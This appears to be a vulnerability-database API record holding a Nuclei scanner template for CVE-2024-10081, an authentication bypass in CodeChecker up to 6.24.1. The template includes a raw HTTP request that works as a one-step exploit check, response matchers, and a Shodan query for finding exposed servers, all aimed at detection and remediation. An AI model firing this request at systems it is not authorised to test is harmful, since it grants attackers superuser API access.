{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-10081/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-10081/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-10081/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-10081/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-10081/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-10081"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-10081"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2024/CVE-2024-10081.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2024-10081\n\ninfo:\n  name: CodeChecker <= 6.24.1 - Authentication Bypass\n  author: iamnoooob,rootxharsh,pdresearch\n  severity: critical\n  description: |\n    Authentication bypass occurs when the API URL ends with Authentication, Configuration or ServerInfo. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others.\n  impact: |\n    Unauthenticated attackers can bypass authentication by crafting API URLs ending with specific keywords, gaining superuser access to all API endpoints including product management and configuration.\n  remediation: |\n    Upgrade CodeChecker to version 6.24.2 or later.\n  reference:\n    - https://github.com/advisories/GHSA-f3f8-vx3w-hp5q\n    - https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-10081\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N\n    cvss-score: 10\n    cve-id: CVE-2024-10081\n    cwe-id: CWE-288\n    epss-score: 0.3992\n    epss-percentile: 0.98577\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: http.favicon.hash:-1496590341\n  tags: cve,cve2024,code-checker,auth-bypass,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /v6.58/Products/Authentication HTTP/1.1\n        Host: {{Hostname}}\n\n        [1,\"getProducts\",1,1,{}]\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body,\"{\\\"0\\\":{\\\"lst\\\":[\\\"rec\\\",\")'\n          - \"!contains(body,'Error code 401: Unauthorized')\"\n          - \"contains(header,'application/x-thrift')\"\n        condition: and\n# digest: 490a00463044022073f5e72b9d333ad4131f32a74c99aa7928c6092fb19e5f95ed4239778aaeba8502206ac72f99bc053e961435747cb57d6b7d1fc6e63a772cfdc41358f16fee89e440:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2024-10081"
}